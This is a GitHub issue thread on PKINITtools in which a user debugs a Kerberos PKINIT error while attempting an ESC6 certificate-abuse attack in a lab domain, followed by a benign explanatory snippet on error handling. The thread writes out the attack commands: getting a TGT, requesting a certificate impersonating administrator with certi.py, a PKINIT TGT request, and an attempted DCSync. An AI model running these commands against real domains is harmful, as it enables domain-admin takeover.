dirkjanm / PKINITtools

Tools for Kerberos PKINIT and relaying to AD CS
MIT License

AttributeError: 'str' object has no attribute 'value' #3

Closed jsdhasfeds closed 11 months ago

jsdhasfeds commented 3 years ago

Hi,

Thank you for your effort developing this tool. I am trying to use the tool to request a TGT but it currently fails. See below for the command I used and the related error.

```
──(shadow)─(root💀kali)-[/home/kali/pentest/PKINITtools-master]
└─# python3 gettgtpkinit.py adlab.local/user_t_1_admins user_t_1_admins.ccache -cert-pfx /home/kali/pentest/pywhisker-main/hHKEiIIf.pfx -pfx-pass OhEKkA1wkW7FC1xUX337
2021-09-13 19:40:13,894 minikerberos INFO Loading certificate and key from file
2021-09-13 19:40:13,919 minikerberos INFO Requesting TGT
Traceback (most recent call last):
  File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 349, in <module>
    main()
  File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
  File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/network/clientsocket.py", line 87, in sendrecv
    raise KerberosError(krb_message)
  File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/protocol/errors.py", line 20, in __init__
    super(Exception, self).__init__('%s Error Code: %d Reason: %s ' % (extra_msg, self.errorcode.value, self.errormsg.value))
AttributeError: 'str' object has no attribute 'value'
```

jsdhasfeds commented 3 years ago

Note that this works when requesting a TGT for the machine account of a DC.

```
┌──(virtual_env_pkinittools)─(root💀kali)-[~/pentest/PKINITtools-master]
└─# python3 gettgtpkinit.py 'adlab.local/DC1$' -cert-pfx /root/pentest/cert.pfx out.ccache
2021-09-16 09:06:34,708 minikerberos INFO Loading certificate and key from file
2021-09-16 09:06:34,808 minikerberos INFO Requesting TGT
2021-09-16 09:06:34,826 minikerberos INFO AS-REP encryption key (you might need this later):
2021-09-16 09:06:34,826 minikerberos INFO 3bb37a1e77811cda4193c61fb2327dbf9763f853c9502d86ab74f632f5f6e32d
2021-09-16 09:06:34,832 minikerberos INFO Saved TGT to file
```

jsdhasfeds commented 2 years ago

Maybe the following will help. I am trying to exploit scenario ESC6 using Kali only.

To be clear, the CA "adlab-SERVER2-CA" has the flag "EDITF_ATTRIBUTESUBJECTALTNAME2" enabled and the service "certsvc" has been restarted.

This is what I do:

1) Request a TGT using known plaintext credentials of a low priv. account:

```
python3 /usr/share/doc/python3-impacket/examples/getTGT.py 'adlab.local/domainuser1:Passw0rd!'
```

2) Update the Kerberos variable with the TGT from the previous step:

```
export KRB5CCNAME=/root/pentest/domainuser1.ccache
```

3) Request a certificate impersonating the "Administrator" account:

```
python3 certi.py req adlab.local/domainuser1@server2.adlab.local adlab-SERVER2-CA -k --no-pass --alt-name administrator --template User -o /root/pentest/administrator.pfx
```

4) Request a TGT for the account "administrator" using the file "administrator.pfx":

```
python3 gettgtpkinit.py adlab.local/administrator /root/pentest/administrator2.ccache -cert-pfx /root/pentest/administrator.pfx -pfx-pass admin
```

Executing gettgtpkinit.py I get the below error:

```
2021-09-13 19:40:13,894 minikerberos INFO Loading certificate and key from file
2021-09-13 19:40:13,919 minikerberos INFO Requesting TGT
Traceback (most recent call last):
  File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 349, in <module>
    main()
  File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
  File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/network/clientsocket.py", line 87, in sendrecv
    raise KerberosError(krb_message)
  File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/protocol/errors.py", line 20, in __init__
    super(Exception, self).__init__('%s Error Code: %d Reason: %s ' % (extra_msg, self.errorcode.value, self.errormsg.value))
AttributeError: 'str' object has no attribute 'value'
```

Note that step 3 works but also outputs "Impersonation of Administrator@adlab.local not allowed with this certificate". This I do not understand since the only mentioned requirement for the scenario ESC6 is that the CA has the flag "EDITF_ATTRIBUTESUBJECTALTNAME2" enabled. If I use a custom template instead of the default template "User", which is supposed to work, and grant "domainuser1" enrollment access on that template, I no longer get the message "Impersonation of Administrator@adlab.local not allowed with this certificate". However, in the end this attack still fails on step 4.

Certi.py comes from https://github.com/eloypgz/certi

jsdhasfeds commented 2 years ago

If I instead execute "python3 gettgtpkinit.py adlab.local/domainuser1 /root/pentest/test/administrator.ccache -cert-pfx /root/pentest/test/administrator.pfx -pfx-pass admin" as step 4, the command works, but when I then attempt to DCSync using "secretdump" and the TGT for domainuser1 (?) it fails with "[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.".

Also note that when performing the same attack from a domain-joined Windows machine using Certify, Rubeus and ticket_converter this all works. I can DCSync just fine. However, both Certify and Rubeus are detected by AV making this plan B.

jsdhasfedssad commented 2 years ago

This error occurs if somehow the domain group Domain Controllers does not have any rights on the CA certificate itself. Add the group, give it the required rights and restart the ADCS service.

dirkjanm commented 2 years ago

This error only showed up when there was an actual Kerberos error being thrown. So the error is outside of the tool, but it's related to the use of the certificate or issues with the PKI setup. Minikerberos was not handling those correctly, which should have been fixed with the latest release there. This won't magically make the attack work if something is wrong, but it should at least give you an error that can point in the right direction.
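To illustrate the class of bug this comment describes, here is an added, self-contained example (not code from minikerberos or PKINITtools): the traceback shows a KRB-ERROR handler that assumes the error code is always an enum member and calls `.value` on it, so a plain string hides the real KDC reason behind an `AttributeError`. The robust version below accepts an enum, an int, or a bare name, and falls back to a readable message instead of crashing; the enum values are the standard RFC 4120 KRB-ERROR codes, and the `REASONS` hints are my own illustrative text.

```python
from enum import IntEnum
from typing import Union


class KerberosErrorCode(IntEnum):
    # Subset of KRB-ERROR codes (RFC 4120 section 7.5.9) that commonly
    # surface when a PKINIT AS-REQ is rejected by the KDC.
    KDC_ERR_C_PRINCIPAL_UNKNOWN = 6
    KDC_ERR_PREAUTH_FAILED = 24
    KDC_ERR_CLIENT_NOT_TRUSTED = 62
    KDC_ERR_CANT_VERIFY_CERTIFICATE = 70
    KDC_ERR_INVALID_CERTIFICATE = 71
    KDC_ERR_REVOKED_CERTIFICATE = 72
    KDC_ERR_CLIENT_NAME_MISMATCH = 75


# Illustrative troubleshooting hints (constructed for this example).
REASONS = {
    KerberosErrorCode.KDC_ERR_CLIENT_NOT_TRUSTED: "KDC could not build a trusted chain for the client certificate",
    KerberosErrorCode.KDC_ERR_CLIENT_NAME_MISMATCH: "requested principal does not match the certificate identity",
    KerberosErrorCode.KDC_ERR_PREAUTH_FAILED: "pre-authentication data was rejected",
}


def naive_format(code, extra_msg: str = "") -> str:
    # Mirrors the failing pattern from the traceback above: it assumes
    # `code` is always an enum member, so a str raises AttributeError.
    return "%s Error Code: %d Reason: %s" % (extra_msg, code.value, code.name)


def naive_breaks_on(code) -> bool:
    # Helper for demonstrating the failure without an uncaught exception.
    try:
        naive_format(code)
        return False
    except AttributeError:
        return True


def format_krb_error(code: Union[KerberosErrorCode, int, str], extra_msg: str = "") -> str:
    # Accept enum, int or bare name; never crash while reporting an error.
    if isinstance(code, str):
        if code not in KerberosErrorCode.__members__:
            return f"{extra_msg} Error Code: ? Reason: {code}".strip()
        code = KerberosErrorCode[code]
    try:
        member = KerberosErrorCode(int(code))
    except ValueError:
        return f"{extra_msg} Error Code: {int(code)} Reason: unknown KRB-ERROR code".strip()
    hint = REASONS.get(member, member.name)
    return f"{extra_msg} Error Code: {member.value} Reason: {member.name} ({hint})".strip()


class KerberosError(Exception):
    # Exception whose message is built by the tolerant formatter above.
    def __init__(self, code, extra_msg: str = ""):
        self.errorcode = code
        super().__init__(format_krb_error(code, extra_msg))
```

With the tolerant formatter, a failed AS-REQ reports the KDC's own code and name, which is the information needed to decide whether the certificate, the CA trust, or the principal name is the problem.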